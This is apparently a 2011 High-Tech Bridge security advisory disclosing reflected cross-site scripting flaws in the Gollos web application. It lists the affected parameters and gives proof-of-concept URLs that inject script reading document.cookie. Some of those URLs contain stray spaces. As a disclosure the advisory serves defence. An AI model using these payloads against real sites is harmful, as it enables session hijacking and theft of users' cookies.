Cross-site Scripting (XSS) Vulnerabilities in Gollos

2011-02-01T00:00:00
ID HTB22830
Type htbridge
Reporter High-Tech Bridge
Modified 2011-02-01T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Gollos which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerabilities in Gollos
1.1 The vulnerability exists due to input sanitation errors in the "returnurl" parameter in register.aspx, publication/info.aspx and user/add.aspx scripts. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in users browser in context of the vulnerable website. Exploitation examples: http://host/?returnurl="><script>alert(document.cookie)</script> http://hos t/register.aspx?return url="><script>alert(document.cookie)</script> https://adminhost/publication /info.aspx?pt=1&return url="><script>alert(document.cookie)</script> https://adminhost/user/add.as px?returnurl="><script >alert(document.cookie)</script> user/add.aspx 1.2 The vulnerability exists due to input sanitation error in the "q" parameter in product/list.aspx. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in users browser in context of the vulnerable website.
Exploitation example:
http://host/product/list.aspx?q=1"><script>alert(document.cookie)</script>&x =0&y=0